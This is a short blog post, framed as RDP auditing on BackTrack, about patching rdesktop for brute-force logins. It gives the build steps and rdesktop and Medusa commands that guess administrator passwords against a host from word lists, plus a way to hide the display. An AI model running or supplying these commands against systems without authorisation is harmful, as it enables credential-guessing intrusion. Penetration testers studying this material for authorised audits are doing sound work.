Saturday, October 06, 2007

Auditing RDP using Backtrack

First thing, there is no support by default for rdp auditing/cracking. for that we will be patching rdesktop 1.5.

Follow the following steps

1. First remove the rdesktop package, use pkgtool to remove the rdesktop package
2. Download the rdesktop version 1.5 from www.rdesktop.org
3. Download the patch from the following link http://www.foofus.net/jmk/rdesktop.html

Patching rdesktop

cd rdesktop1.50/
patch -p1 -i rdp-brute-force-r805.diff
./configure
make
make install


Usage


Brute-force attack using password file:
rdesktop -u administrator -p passwords.txt 192.168.0.100

Brute-force attack sending passwords via STDIN:
rdesktop -u administrator -p - 192.168.0.100

The following example shows one way to use rdesktop with the MEDUSA wrapper module:

medusa -M wrapper -m TYPE:STDIN -m PROG:rdesktop -m ARGS:"-u %U -p - %H" -H hosts.txt -U users.txt -P passwords.txt

One possible method for hiding the graphical output from rdesktop:
% Xvfb :97 -ac -nolisten tcp &
% export DISPLAY=:97

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)